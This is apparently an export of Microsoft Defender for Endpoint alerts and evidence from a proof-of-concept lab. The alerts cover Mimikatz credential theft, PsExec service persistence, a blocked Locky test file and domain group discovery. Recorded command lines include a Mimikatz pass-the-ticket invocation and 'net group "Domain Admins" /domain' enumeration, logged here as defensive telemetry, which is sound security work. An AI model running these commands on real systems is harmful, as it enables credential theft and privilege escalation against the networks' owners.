"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-12-22T08:59:27.94Z
|
Suspicious
|
None
|
user1
|
MSDXV8
|
S-1-5-21-2159906967-4174806019-1002223092-1104
| null |
jeff@msdxv8.m365dpoc.com
|
6cbce4a295c163791b60fc23d285e6d84f28ee4c
|
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
| 6,324
|
"powershell.exe" -noexit -command Set-Location -literalPath 'C:\Users\jeff\Desktop'
|
2022-12-22T08:47:11.8139068Z
| 1,896
|
2022-12-22T08:26:24.0772409Z
|
explorer.exe
|
C:\Windows
|
Detected
|
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-12-22T08:59:44.16Z
|
Suspicious
|
None
|
svc_acct
|
MSDXV8
|
S-1-5-21-2159906967-4174806019-1002223092-500
| null |
Defender@msdxv8.m365dpoc.com
|
6cbce4a295c163791b60fc23d285e6d84f28ee4c
|
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
| 356
|
"powershell.exe"
|
2022-12-22T08:28:16.1808894Z
| 6,960
|
2022-12-22T08:27:20.6569514Z
|
explorer.exe
|
C:\Windows
|
Detected
|
3ad3fb0567038c2ec2e59e76690c2e6c01253af9
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-21T02:03:43.66Z
|
Suspicious
|
None
|
jeff
|
test.domain
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-21T02:22:39.7433333Z
|
Suspicious
|
None
|
steve
|
staging.net
|
S-1-5-21-2300221942-1987151257-321556088-1107
|
0808dea1-2ec8-41d2-8e3e-7c18309fab09
|
steve@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-14T17:38:47.99Z
|
Suspicious
|
None
|
darol
|
lab.net
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-11T08:18:14.6166667Z
|
Suspicious
|
None
|
jeff
|
lab.net
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-21T02:04:30.4666667Z
|
Suspicious
|
None
|
admin
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1111
|
89b6fc86-af84-47b2-a72d-325362598b2c
|
ronhd@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-09-30T06:15:59.7633333Z
|
Suspicious
|
None
|
svc_acct
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1107
|
0808dea1-2ec8-41d2-8e3e-7c18309fab09
|
steve@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-14T17:07:32.1166667Z
|
Suspicious
|
None
|
analyst
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930212799134_-270199467
|
67e70048-1466-4a32-83ce-4b5a518a3324
| 765
|
MicrosoftDefenderForEndpoint
|
2022-11-21T02:03:41.2799368Z
|
2022-11-21T03:45:17.6166667Z
|
2022-11-21T03:45:17.4759763Z
|
2022-11-21T02:01:44.3120047Z
|
2022-11-21T02:33:53.306249Z
|
Mimikatz credential theft tool
|
The Mimikatz hacktool was detected on this device. Mimikatz is a credential theft tool that can harvest plaintext passwords, password hashes, smartcard PINs, and Kerberos tickets. An attacker might be trying to harvest credentials to log into this or other devices on the network, by impersonating a valid user.
|
CredentialAccess
|
Resolved
|
High
| 50
|
SuccessfullyRemediated
| null | null |
WindowsDefenderAv
|
8cac979e-6dcc-44ad-8355-480eebaff1c1
| null | null |
Mimikatz
|
[] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Low",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:03:41.3233333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:14:25.5266667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T05:14:34.54Z
|
Suspicious
|
None
|
user1
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
6cbce4a295c163791b60fc23d285e6d84f28ee4c
|
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
| 4,976
|
"powershell.exe"
|
2022-11-18T05:04:12.7150402Z
| 4,680
|
2022-11-10T07:07:26.0872385Z
|
explorer.exe
|
C:\Windows
|
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T04:42:55.3033333Z
|
Suspicious
|
None
|
Takeshi
|
TMTOWER-BOOK
|
S-1-5-21-7316772-2057538409-3008203053-1001
| null | null |
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 10,396
|
cmd.exe /c whoami
|
2022-11-18T04:38:47.7166801Z
| 14,616
|
2022-11-14T04:36:16.5242809Z
|
powershell.exe
|
\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
83b06aa80899050e5d4132992e36b5b8f14b64e9
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-12T13:47:27.91Z
|
Suspicious
|
None
|
root
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638037515790902965_1802135643
|
e8c36505-2a63-4dbe-8d0e-a930ffd7a47b
| 686
|
MicrosoftDefenderForEndpoint
|
2022-11-11T08:19:39.0903155Z
|
2022-11-18T00:39:00.6933333Z
|
2022-11-12T01:35:42.84Z
|
2022-11-11T08:17:13.2923676Z
|
2022-11-11T08:17:34.312333Z
|
Suspicious file registered as a service
|
A file with suspicious attributes or involved in possible breach activity was registered as a service. An attacker might be attempting to register the file as a service for persistence.
|
Persistence
|
Resolved
|
Medium
| 36
|
TerminatedBySystem
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
d15c9f84-aabc-46e5-a92e-7bb3ce5eceda
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1021.002",
"T1074.002",
"T1543.003",
"T1569.002",
"T1570"
] |
[
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "Medium",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] |
[
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:19:39.2166667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-11T08:19:39.2166667Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T04:44:34.5966667Z
|
Suspicious
|
None
|
guest
|
TMTOWER-BOOK
|
S-1-5-21-7316772-2057538409-3008203053-1001
| null | null |
9678ea8069d9812cda2a41c9d3dc32d5c4555b7b
|
529ee9d30eef7e331b24e66d68205ab4554b6eb3487193d53ed3a840ca7dde5d
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
| 14,616
|
powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Import-Module 'c:\Users\Takeshi\.vscode\extensions\ms-vscode.powershell-2022.8.5\modules\PowerShellEditorServices\PowerShellEditorServices.psd1'; Start-EditorServices -HostName 'Visual Studio Code Host' -HostProfileId 'Microsoft.VSCode' -HostVersion '2022.8.5' -AdditionalModules @('PowerShellEditorServices.VSCode') -BundledModulesPath 'c:\Users\Takeshi\.vscode\extensions\ms-vscode.powershell-2022.8.5\modules' -EnableConsoleRepl -StartupBanner \"PowerShell Extension v2022.8.5
Copyright (c) Microsoft Corporation.
https://aka.ms/vscode-powershell
Type 'help' to get help.
\" -LogLevel 'Normal' -LogPath 'c:\Users\Takeshi\AppData\Roaming\Code\User\globalStorage\ms-vscode.powershell\logs\1668400572-3c88b720-7963-4dd6-aba1-3456f669fe051668400566006\EditorServices.log' -SessionDetailsPath 'c:\Users\Takeshi\AppData\Roaming\Code\User\globalStorage\ms-vscode.powershell\sessions\PSES-VSCode-11004-905307.json' -FeatureFlags @() "
|
2022-11-14T04:36:16.5242809Z
| 12,136
|
2022-11-14T04:36:09.1457881Z
|
Code.exe
|
\Device\HarddiskVolume3\Users\Takeshi\AppData\Local\Programs\Microsoft VS Code
|
Detected
|
83b06aa80899050e5d4132992e36b5b8f14b64e9
|
da638095379371990747_-43346098
|
849fe427-119b-46cc-ac86-d6fd685e34a5
| 984
|
MicrosoftDefenderForEndpoint
|
2023-01-17T07:38:57.1990965Z
|
2023-01-17T07:44:35.38Z
| null |
2023-01-17T07:26:37.0136661Z
|
2023-01-17T07:26:37.0136661Z
|
'Locky' ransomware was prevented
|
Ransomware use common methods to encrypt files using keys that are known only to attackers. As a result, victims are unable to access the contents of the encrypted files. Most ransomware display or drop a ransom note—an image or an HTML file that contains information about how to obtain the attacker-supplied decryption tool for a fee.
To target documents or other files that contain user data, some ransomware look for files in certain locations and files with certain extension names. It is also common for ransomware to rename encrypted files so that they all use the same extension name.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
|
Ransomware
|
New
|
Medium
| 64
|
PartiallyRemediated
| null | null |
WindowsDefenderAv
|
51d03c45-b142-4de4-95df-01b0c259d8f6
| null | null |
Locky
|
[] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Unknown",
"deviceDnsName": "internal.corp",
"firstSeen": "2023-01-17T07:15:11.3017269Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "7e5c8ca006a6a3ea72dbfbafdbcd8f5e14744ce5",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Medium",
"tags": [],
"version": "21H1",
"vmMetadata": null
}
] |
[
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "7e5c8ca006a6a3ea72dbfbafdbcd8f5e14744ce5",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2023-01-17T07:38:57.4466667Z",
"fileName": "TestFile_Block_Office_applications_from_creating_executable_content_3B576869-A4EC-4529-8536-B80A7769E899.docm",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Office applications from creating executable content",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": "File was created again after being remediated by antivirus",
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072958361208636_-774564177
|
dacbe670-c799-4085-9e4b-0c16dbfa3330
| 975
|
MicrosoftDefenderForEndpoint
|
2022-12-22T08:50:36.1208906Z
|
2022-12-22T08:50:42.2233333Z
| null |
2022-12-22T08:47:23.1371052Z
|
2022-12-22T08:47:28.9843705Z
|
Suspicious Permission Groups Discovery
|
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
|
Discovery
|
New
|
Low
| null |
UnsupportedAlertType
| null | null |
WindowsDefenderAtp
|
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
| null | null | null |
[
"T1069.001",
"T1069.002",
"T1087.001"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "prod.env",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "High",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] |
[
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:50:36.15Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:50:36.15Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"net.exe\" group /domain",
"processCreationTime": "2022-12-22T08:47:23.1029019Z",
"processId": 2936,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:50:36.15Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:26:24.0772409Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 1896,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Desktop'",
"processCreationTime": "2022-12-22T08:47:11.8139068Z",
"processId": 6324,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:50:36.2666667Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain",
"processCreationTime": "2022-12-22T08:47:23.149947Z",
"processId": 9268,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:50:36.5266667Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain",
"processCreationTime": "2022-12-22T08:47:23.2090769Z",
"processId": 1912,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-21T02:05:47.11Z
|
Suspicious
|
Active
|
alice
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 1,648
|
"mimikatz.exe" privilege::debug "kerberos::ptt C:\M365DAttack\Admin-Tickets" exit
|
2022-11-21T02:02:26.7968671Z
| 11,068
|
2022-11-21T02:01:28.4753286Z
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-18T05:12:05.38Z
|
Suspicious
|
None
|
alice
|
MSDXV2
|
S-1-5-21-2300221942-1987151257-321556088-1111
|
89b6fc86-af84-47b2-a72d-325362598b2c
|
ronhd@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-09-30T06:15:08.81Z
|
Suspicious
|
Active
|
user1
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d
|
8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b
|
explorer.exe
|
C:\Windows
| 4,668
|
Explorer.EXE
|
2022-08-23T12:17:37.8693453Z
| 4,628
|
2022-08-23T12:17:37.5657089Z
|
userinit.exe
| null |
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-18T05:13:00.6633333Z
|
Suspicious
|
None
|
jeff
|
lab.net
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-13T21:50:32.66Z
|
Unknown
|
None
|
darol
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-22T09:30:44.15Z
|
Suspicious
|
None
|
analyst
|
MSDXV8
|
S-1-5-21-2159906967-4174806019-1002223092-1104
| null |
jeff@msdxv8.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
da638072957269391914_460423443
|
8e2d122c-81ac-4e3d-b833-ed3b945bae52
| 975
|
MicrosoftDefenderForEndpoint
|
2022-12-22T08:48:46.9392096Z
|
2022-12-22T09:10:33.4366667Z
| null |
2022-12-22T08:47:56.5126458Z
|
2022-12-22T09:09:24.2035127Z
|
Malicious credential theft tool execution detected
|
A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
|
CredentialAccess
|
New
|
High
| null |
UnsupportedAlertType
| null | null |
WindowsDefenderAtp
|
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
| null | null | null |
[
"T1003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10v.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T05:21:19.944Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Critical",
"tags": [],
"version": "1809",
"vmMetadata": null
}
] |
[
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-22T08:48:46.97Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
